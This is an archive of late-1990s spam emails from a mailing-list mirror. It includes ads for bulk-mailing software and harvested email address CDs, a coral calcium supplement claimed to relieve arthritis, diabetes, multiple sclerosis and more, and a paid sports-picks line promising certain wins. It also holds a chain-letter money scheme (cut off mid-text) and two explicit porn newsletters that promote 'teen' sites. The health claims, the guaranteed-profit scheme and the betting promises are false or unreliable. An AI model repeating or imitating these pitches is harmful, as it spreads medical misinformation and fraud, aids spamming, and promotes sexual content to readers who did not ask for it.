If you would like to unsubscribe from the Eureka! Newsletter
simply select reply and send us a quick reply to this email.
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "unknown" <nomdomain@10889.com>
Date: Sun, 4 Jan 1998 22:42:19 -0800 (PST)
To: Friend@public.com
Subject: The Virtual Law Library
Message-ID: <The Most Cost Effective Legal Research Tool On The Market Today!>
MIME-Version: 1.0
Content-Type: text/plain


	This is the time of year when we all sit down to reflect on last year and set some new goals for the coming year.  What kind of year was 1997 for you?  What will be your goals for 1998?  Why not make prosperity your goal for '98?  There are many things that come under the auspices of 'prosperity' including time, money, love, success, balance, joy, comfort, beauty, good health, wisdom, etc.

	Are you prosperous with your time?  Or, do you always feel rushed and pressured?  Do you always feel there's not enough time to do the things you want to do?  Then you have poverty with respect to time.  Wall Street Journal wrote that leisure time, not money, will be the status symbol of prosperity in the coming years.

	There is now a new legal research tool available that will not only save you countless hours of unbillable time, but also allows you to efficiently locate the same information available through Westlaw and Lexis Nexis without paying one minute of on-line fees.  And the best part is, it doesn't cost you $500. to $1,000. a year in additional service charges.

	If you think this is too good to be true, WinServices Technologies' Virtual Law Library on CD-ROM will, however, cost you $69.95.  The Virtual Law Library will unleash the full power of your personal computer by giving you access to more than 15,000 free legal research sites on the Internet. 
	
	Jane Block, the National Federation of Paralegal Associations' Cyberparalegal of the Year, states that "by using the Virtual Law Library I am able to cut my research time on the Internet by more than 75%."  

	Rob Lloyd, a third-year law student at Seattle University Law School, claims that "the Virtual Law Library is so comprehensive, it has almost eliminated my trips to the Law Library."

Come visit us at: 
http://www.winservices.com/

Order your Personal Edition through our secured Web Site at: 
http://www.winservices.com/legalresearch/library/

For more information or to order your Personal Edition of the Virtual Law Library call: 253-813-6930

To rush your order simply fill out the order form below and fax it to our 24 hour order line at: 253-813-6980 or

Mail your order to:
WinServices
P.O. Box 23845
Federal Way, WA  98093-0845


ORDER FORM
----------------------------------------------------------------------

Your Name________________________________________________________

Your Address______________________________________________________

Your City_________________________________________________________

State / Zip_________________________________________________________

Phone #: ________-____________-__________________
(For problems with your order only. No salesmen will call.)

Email Address_____________________@__________________________

We Accept Checks or Money Orders along with all Major Credit Cards
including Visa, MasterCard, Discover and American Express (NOTE - We only ship to the address listed on the credit card)

(Please Fill Out the Section Below and Make sure that the above name and address are listed as it appears on the card) for $69.95

Credit Card Number: _____________________________________

Expiration Date: __________/____________

Signature: ____________________________

Date: _______________________


Or order your Personal Edition through our secured Web Site at: 
http://www.winservices.com/legalresearch/library/

Thanks for ordering the Virtual Law Library!
Please allow two weeks for shipping and handling.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 15952576@compuserve.com
Date: Mon, 5 Jan 1998 00:06:43 -0800 (PST)
To: 87659123456@aol.com
Subject: The De Facto Standard
Message-ID: <451534865234.GBB21218@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


{Removal instructions at bottom... }


 ****  Attention Internet Marketers/Mass E-mailers  ****


THE HANDIEST PIECE OF SOFTWARE YOU WILL EVER OWN!

Is preparing your e-mail lists for mailing a tedious and 
time-consuming affair? AUTOMATE those tasks with:


 <><>  BulkMate v4.0 - the de facto standard in ultra high-speed
 <><>  e-mail list processing/management - US$99. 


NOTE: For the first 500 customers - FREE 37 Million e-mail address CD.
(..or if you just want the CD only - US$69).


Try BulkMate v4.0 for 5 full days at no cost by downloading the
FULLY FUNCTIONAL demo at our web site. Just for trying it we'll 
give you 250,000 e-mail addresses free.

This software will save you HOURS of work. It's the definitive tool 
in preparing your lists for mailing. (Works for Win95, Win.3.1,and 
Win NT). There is nothing else out there like this software that 
even comes close.


..Just double-click on this web page link :

http://cus.alpina1.net/worldwide/ 


Best Regards, 
     Worldwide Marketing Group

P.S: If you have received this message more than once, we apologize.
     For removal from any future mailings, just send a blank e-mail to
     this address:

wmgremv@alpina1.net 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pads@mouse.com
Date: Mon, 5 Jan 1998 00:27:41 -0800 (PST)
Subject: Personalized Mouse Pads
Message-ID: <eaep.3.0.reg.SteIUZ.35800.015200463@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



     Have you ever wondered why your mother gave you the name she did?  Were you named after 
a close relative, family friend or possibly a television celebrity?  

     Well, we can't tell you why either!  However, what we can tell you is exactly what your name 
means!  

     We print your name and it's meaning on an attractive mouse pad with a custom art background 
of vibrant colors and scenery.  Not only is it pleasant to look at, but everytime you sit down to your 
computer, you'll be reminded of just how great you are. 

     We have the largest most comprehensive database of names anywhere.  And we can print 
names in both Spanish and English.

     We are so sure you'll be pleased with your personalized mouse pad, that we offer a 30 day 
unconditional money back guarantee.

     Placing your order is easy too!  Just complete the order form below and mail it along with just $10 
plus shipping and handling. (see below), and we will rush your personalized mouse pad by first class 
mail. 

     Choose your background preference!!

ABC BLOCKS                                         ANGELS                                         CLOUDS   

DOLPHINS                                            PRAYING HANDS                          SPORTS 

TEDDY BEAR                                        UNICORN                    or               WATERFALL

                                                              EASY ORDER FORM   

NAME REQUESTED                            MALE/FEMALE                               BACKGROUND PREF.

_________________                            ____________                     ________________________

_________________                            ____________                     ________________________

_________________                            ____________                     ________________________

QUANITY ORDERED_______________                  AMOUNT SENT$_______________

CASH CHECK OR MONEY ORDER'S ONLY!!!!                       US FUNDS ONLY!!!!!!!

USA MAILORDERS $12 EA                                   OVERSEAS ORDERS $14 EA
(includes $2 shipping/handling charge)                   (includes $4 shipping/handling charge)

MOST ORDERS SHIPPED WITHIN 48 HOURS.  IF  PAYING BY CHECK,  YOUR ORDER WILL 
BE SENT IMMEDIATELY FOLLOWING BANK APPROVAL.

PLEASE MAIL YOUR ORDER TO:       3J PRODUCTS
                                                               PO BOX 7183
                                                               OXNARD CA 93031

              





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 5 Jan 1998 01:46:34 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Jan 5 '98
Message-ID: <19980105081629.11349.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

FRESHTEENS!
Is there no end to it? Yet again we have succeeded in obtai-
ning a FREE one week trial,  for all Eureka!  subscribers at
another of the net's finest websites. Freshteens offers over
200 video feeds, hot live,  sex shows,  hard XXX movies, hot
XXX stories,  exclusive Texas Teens, and a comprehensive gay
area too. You need a credit card to verify you are an adult,
but will not be charged for your FREE membership. Excellent!
Freshteens ........... http://www.freshteens.com/cproot/1217

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

SOFTVELVET
"Our Pictures are NOT the same  old pics you have seen a 100
times before. Nor are they burnt out porn models... They are
young, fresh and  eager!!"  Some decent pix,  including blow
jobs and anal.  Long  dicks, facials, not a bad site to see.
Softvelvet ...................... http://www.softvelvet.com/

SEX YOU
This is a horn dog zone!  Super fast loading free pix. Great
pussy shots, bent over and in your face. Dick sucking in the
health club.  This site may just cause a stir in your loins!
Sex You ................. http://www.arg-inc.com/sexwarn.htm

PUSSY EATERZ
Just a few pix but they are  pretty large and feature some a
few hot and horny tramps having their bush sucked, squeezing
their tits and all that jazz.  Another browser will open for
the pix, then will rotate them through.  Finger lickin good!
Pussy Eaterz! ........... http://sexplosion.com/pussyeaters/

WHACKING ZONE
Way down at the  bottom there is a text link that says, "cum
inside  Whacking Zone!"  Hit that and  your in.  You have to
click around a  little but the pix are there.  The webmaster
has  little descriptions  of each, like, "hot babe spreading
her legs for you to get a great glimpse of her pussy."  Mmm!
Whacking Zone .............. http://www.ultrafreexxx.com/wz/

FREE CONTEST!
This week's brand new competition. A  free three-month memb-
ership is  up for grabs daily  at HardCoreSmut.Com! A $75.00
Value!  So are you  ready to win?  Simply visit the site and
click on  "FREE GUIDED TOUR".  Then  email  us the answer to
this  question:  "How  Many Live  No  DownLoad  Sex Shows do
members get?" Send answers to mailto:contest@www.usachat.com
HardCoreSmut .................. http://www.hardcoresmut.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Four LIVE feeds ........... http://www.holler2.com/vidx.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
OASIS: The Internet's queen of exhibitionism,  not only does
she love to get nude and nasty in public, but her webpage is
awesome! Easy to navigate, nice graphics, and very well des-
igned.  Oasis loves group sex  and has been known to take on
up to 4 guys a once! She also loves to play with the ladies.
Oasis loves to travel,  she may be coming to a city near you
who knows you may get lucky.  But until then catch a glimpse
of the sexual dynamo!
TODAY'S FREE PIX
OK,  it's the new year, and now we are really going to start
getting in gear,  with some of the hottest FREE photos ever!
Pic  1 ........................... http://137.39.63.229/?050
Pic  2 ........................... http://137.39.63.229/?051
Pic  3 ........................... http://137.39.63.229/?052
Pic  4 ........................... http://137.39.63.229/?053
Pic  5 ........................... http://137.39.63.229/?054
Pic  6 ........................... http://137.39.63.229/?055
Pic  7 ........................... http://137.39.63.229/?056
Pic  8 ........................... http://137.39.63.229/?057
Pic  9 ........................... http://137.39.63.229/?058
Pic 10 ........................... http://137.39.63.229/?059

PLEASE VISIT THIS EUREKA! PARTNER SITE
SWEET TEENS ! Over 2500 Teen Hardcore Pics ! 
http://www.sweet-teens.com
SWEET TEENS ! Over 3000 Teen Pics and Movies sorted into the
following Sections: Teen  Series, Actio Series, Lesbian
Teens and much much more ! NEW: The original Pics and Videos
from Pamela Andersons XXX Movie ! Cum get em !!
===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew" <andrew@sexswap.com>
Date: Sun, 4 Jan 1998 13:54:25 -0800 (PST)
To: swapmembers@sexswap.com
Subject: HOW TO GET 2%-10% MORE HITS - I N S T A N T L Y !
Message-ID: <199801051125550830.05126488@sexswap.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We don't wish to send people email that hate spam...
If you wish to be removed from future mailings, simply
enter your email(s) in the box at http://www.removelist.com. Thanks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HOW TO GET 2%-10% MORE HITS - I N S T A N T L Y !

SexSwap is the FASTEST and LARGEST Adult Banner Exchange.
We help webmasters trade banners with 2,000 sites FREE.
We show 22.45 banners every second, 2,000,000 banners a day.
http://www.sexswap.com

I am going to tell you 3 things:
1. How SexSwap can INCREASE your HITS
2. Why PICK SEXSWAP over the competition
3. How to JOIN SEXSWAP

1. HOW SEXSWAP CAN INCREASE YOUR HITS
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

Ok, we have to push the pencil around a little bit, I know you hate math, but stay with me...

1. You JOIN team SexSwap Banner Exchange
2. You paste some code
3. You upload your banner

Here comes the math.
Every time your page loads (where you paste the code), we give you 1 credit..and for every 2 credits...we then show your banner on 1 of 2,000 adult sites.

We make it easy to trade banners with 2,000 sites, and only use up one banner slot on your page.

OK, more math...grade 3 stuff ;) ...
let's say your page loads 1,000 times in one day, you get your banner shown 500 times FREE! And if your banner gets a 4% average click-thru rate, then you just got 40 free hits, or 2% more hits (everyday) for 3 minutes work.

BUT IT GETS BETTER
Many sites on SexSwap get a 20% click thru rate...if you have a ratio that high, then you get .2X500 or 100 clicks, which is 10% more hits.

BUT IT GETS EVEN BETTER
You can join as many times as you wish and paste different code on every damn page of your site...MULTIPLYING THE EFFECTS....so some people can ratchet
20-30% more hits, just buy JOINING SexSwap and by pasting the code on several pages of your site.


2. WHY CHOOSE SEXSWAP OVER THE COMPETITION
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

WE WANT YOU ON THE SEXSWAP TEAM!

We are the largest adult banner exchange with 2,000+ member sites.
We are the fastest banner exchange showing 20+ banners per second.
We are the only banner exchange with 5 features dedicated to catching CROOKS! We keep the traffic CLEAN.
We are the only banner exchange to publish the weekly SexSwap News that is chock full of tips and tricks...some members say that the newsletter is worth its weight in gold.

3. HOW TO JOIN SEXSWAP IN 2-3 MINUTES
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

We are the only adult banner exchange where the owner is the tech support and responds to email within hours...not days...I WILL HOLD YOUR HAND!

We can't double your hits, but we can give you a 2%-10% boost in hits without pain.

http://www.sexswap.com

check us out, compare us to the competition, test our speed.

http://www.sexswap.com

Andy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 34194245@earthlink.net
Date: Tue, 6 Jan 1998 02:22:46 -0800 (PST)
To: Nutirisoft@weightloss.com
Subject: DIET, NUTRITION AND WEIGHT LOSS SOFTWARE
Message-ID: <586739fhkh75930fgj@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


NUTRIQUIK

A software program to help you monitor your nutritional needs and caloric intake.  It runs on any version of MS Windows, version 3.1 or higher.  It contains a database of over 900 food items and their nutritional values from the USDA.  The setup screen allows you to post maximum calories, sodium intake and maximum fat intake.  The setup screen also allows input of current weight, desired weight and attainment date.  Daily posting screen for entering weight, blood pressure and resting pulse rate.  The daily recording screen to enter foods consumed from database or manual entry.  Contains a menu planner to plan meals and view calories, fats, vitamins, etc.  You can store favorite meals in the database so you don't have to keep reentering them.  There are warning messages if you exceed your maximum calories, sodium or fats.  The daily summary screen displays totals for the day and by the Food Group Pyramid.  It has a thirty day report to track progress month to month and you can !
watch your progress on the Weight Loss graph.

This is the easiest way to modify and take control of your dietary habits.

To order:  Print out and fill in the form below. Allow 2 to 3 weeks for delivery.


Name:_____________________    Date:___________

Street:_____________________     Apt:___________

City: ______________________     State: _____  Zip: _______

Send cash, check or money order for U.S. $35.00 To:

NUTRISOFT, INC.
P.O. BOX 66753
FALMOUTH, ME 04105






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frant@mclafmall.com
Date: Tue, 6 Jan 1998 01:18:00 -0800 (PST)
To: frant@mclafmall.com
Subject: Healthy Life
Message-ID: <199801060919.DAA20222@mail.family-net.net>
MIME-Version: 1.0
Content-Type: text/plain


For years people have been trying to find the perfect health supplement
now we've found it.  Introducing  Ericson's  Alka-Mine  Coral Calcium from Okinawa.
 
Over 150 diseases are linked to ionic calcium deficiency. reports from
of users of Ericson's Alka-Mine Coral Calcium include partial or total
relief from symptoms of:

Arthritis, Indigestion, Over-Acidity, fatigue, Headache, Osteoporosis,
Diabetes, Immune Dysfunction, Allergies, Candida or Yeast infection,
Breathing Disorders, Psoriasis, Eczema, Sinusitis, Kidney Stones, 
Prostatitis, Frequent Colds/Flu, Athlete's Foot, Muscle Cramps, Multiple
Sclerosis, Acne, Fever Blisters, Ulcers, Impotency, High Blood Pressure,
Bone Spurs, Insomnia, Hiatal Hernia, Gallstones, Poor Circulation,
Fibromyalgia, Gout, Constipation, Toxicity, High Cholesterol, any much
more. 

Come discover the secrets of the worlds oldest man.  Click here for more
information and how to order Ericsons Coral Calicium From Okinawa.

http://www.mclafmall.com/coral


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 6 Jan 1998 03:47:02 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Jan 6 '98
Message-ID: <19980106082624.9999.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

PLAYGAL
This is truly a breathtaking site. Well-designed and easy to
use with  excellent content.  The tour alone has hotter porn
than many other 'free' sites - go see it now. It's explicit,
comprehensive and top quality.  There are 2,000  video feeds
online, free live fucking with sound, 10,000 erotic stories,
1,000s of top quality pix, adult and arcade games, real ama-
teur competitions and much more. Click now and be astounded!
Playgal .... http://www.playgal.com/playgal/banner_abc1.html

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

KILLER PORN
Interesting name?  Well regardless of the name there are pix
that will crankup your stick if you know what I mean.  There
are lesbians munching bush, chicks  sucking rock hard dicks,
and great 69 pix.  Lots of  free pix, fast loading. Surf it!
Killer Porn ................. http://www.kjmedia.com/killer/

BLASTMASTER'S
Juicy pix of lesbians, babes and babes using toys. Like dil-
dos us the tail and pussy at the same time. Double action as
some might say.  Worth the modem trip for sure.  Ooooh yeah!
Blast ........ http://uts.cc.utexas.edu/~phobos/blastmaster/

RADICAL BABES
Fast loading, great pix! A little bit on the softer side but
well worth the trip. These are beautiful women posing for us
in sexy spots, like down by the lake. There are several gal-
leries for us to enjoy. I especially like the chick with the
horse.  Nothing illegal there, just an equestrian and steed.
Radical Babes ........ http://www.pornsugar.com/radical.html

RABBIT'S HARDCORE HOLE
This bunny has it going on! Tons of fast loading jpegs!  You
gotta see this site. Cum globbed women, bent over teens with
hairy hineys. This is a sex secret on the web. Caution, your
hand may just leave your mouse!  Bookmark and surf it, Yeah!
Rabbit's Hardcore ........... http://www.sexhost.net/rabbit/

FREE CONTEST!
Today,  win another hot free 3 month membership to Hardcore-
smut. It's there Job to have the Best HardCore, the internet
has to  offer available,  and you'll be  amazed at what they
have. Visit hardcoresmut and click on 'Erotic Stories'. what
is   the  missing  word?   "over ___ xxx  erotic  stories!".
Send answers to ............. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Videos plus chat ..... http://209.1.233.50/chat/freechat.cgi

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
CAROLINA FOX: This tall slinky blonde is well know in the SM
/BD community.  She is a professional submissive! This woman
is plain kinky,  and she love to be tied up.  She also loves
to seduce  young women,  sounds familiar?  Whips and chains,
pantyhose and high heals are all fetishes of hers. She wants
to hurt so good!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Very Sexy Erotic Stories: Ready  for  lots  of hot, free sex
stories? Look no further than  Very Sexy Erotic Stories. All
different subjects, all free. ..... http://www.verysexy.com/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?060
Pic  2 ........................... http://137.39.63.229/?061
Pic  3 ........................... http://137.39.63.229/?062
Pic  4 ........................... http://137.39.63.229/?063
Pic  5 ........................... http://137.39.63.229/?064
Pic  6 ........................... http://137.39.63.229/?065
Pic  7 ........................... http://137.39.63.229/?066
Pic  8 ........................... http://137.39.63.229/?067
Pic  9 ........................... http://137.39.63.229/?068
Pic 10 ........................... http://137.39.63.229/?069

PLEASE VISIT THIS EUREKA! PARTNER SITE
Persian Kitty's Adult Links
http://www.persiankitty.com/pk.html
The #1 most visted adult links site on the Web.  Persian
Kitty's is now in it's 3rd year! Updated twice each day.
Plus the Purrfect Pose and the Desktop Image of the Week!
===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: workadmn@ix.netcom.com
Date: Tue, 6 Jan 1998 02:47:15 -0800 (PST)
To: Friend@public.com
Subject: Just Released!  16 Million!
Message-ID: <14942598_90204097>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in  excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 150+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.   We received it just
prior to finishing production work on the new CD.   We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.   We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be.

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
 
AND
 
the a sampling of CyberPromo's HOT list.

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere..PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1 email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
Rapture Marketing Inc.
P.O. Box 616
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght1823@aol.com
Date: Tue, 6 Jan 1998 14:57:15 -0800 (PST)
To: pkmrt1245993@aol.com
Subject: Prodigious Sports Picks
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
     Hello, wouldn't it feel really great to know exactly who was going to win 
the NBA game between Houston Rockets at Cleveland Cavs and our 
BIG PICK in college basketball game, Kentucky at Georgia.  Well, that is
why Prodigious Picks and Associates is here.  If you have called us this past 
week, we know that you have already won big.  We have picked 15 of the last
19 games by the line, going 6-2 in the NFL playoff games and 9-2  in the last 
eleven bowl games this week.  I will inform you that we decide our picks by
using a consensus system analysis program by taking the picks of the top 
SEVEN best handicappers in the country.  We continue to prove that this
system is the best in the business.  You can't go wrong.  Don't lose your money
trying to pick the games yourself or by even calling some other handicapper 
whose price per call is much more expensive than ours.  Let us do the work and 
you get the MONEY!  So give us a call Monday and we WILL deliver!  

                                                   1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you cash in on Tuesday, give us a call Wednesday for more
         basketball action. We will also be having the winning picks for the 
         AFC and NFC championship games after Friday.
        
		       

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ww44me@ix.netcom.com
Date: Tue, 6 Jan 1998 21:11:13 -0800 (PST)
Subject: Looking For Extra Cash???
Message-ID: <eaep.3.0.reg.Den9TJ.35801.725031713@mail.rain.org>
MIME-Version: 1.0
Content-Type: text/plain



Hello my name is Denette,

PRINT this letter, read the directions, THEN READ IT AGAIN !!!

The company I was working for just went out of business and I've been looking for a job.  I always 
used to delete unsolicited e-mail advertisements before I finished reading them.  I received what I 
assumed was this same e-mail countless times and deleted it each time.

Recently I received it again and thought , "OK, I give in, I'm going to try this, I need the money.  I 
can certainly afford to invest $20 and, on the other hand, there's nothing wrong with creating a little 
excess cash."  I promptly mailed four $5 bills and after receiving the reports, paid a friend of mine a 
small fee to send out some e-mail advertisements for me.  After reading the reports, I also learned 
how easy it is to bulk e-mail for free! 

You just need to follow the directions EXACTLY and you will reap the rewards also.  Read this letter, 
pick a lifelong dream you have and apply the letter and you will achieve success.  It really is that 
easy.  You don't need to be a wizard at the computer, but I'll bet you already are.   If you can open 
an envelope, remove the money, and send an e-mail message, then you're on your way to the bank.  
If I can do this, so can you!

                       GO FOR IT NOW!!

The following is a copy of the e-mail I read:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEY-MAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you may ever see.  Many times 
over, it has demonstrated and proven its ability to generate large amounts of cash.  This program is 
showing fantastic appeal with a huge and ever-growing on-line population desirous of additional 
income.

This is a legitimate, LEGAL, money-making opportunity.  It does not require you to come in contact 
with people, do any hard work, and best of all, you never have to leave the house, except to get 
the mail and go to the bank!  

This truly is that lucky break you've been waiting for!  Simply follow the easy instructions in this letter, 
and your financial dreams will come true! When followed correctly, this electronic, multi-level 
marketing program works perfectly...100% EVERY TIME! 

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc., 
    -  Even retire! 

This is your chance, so don't pass it up!

----------------------------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY 
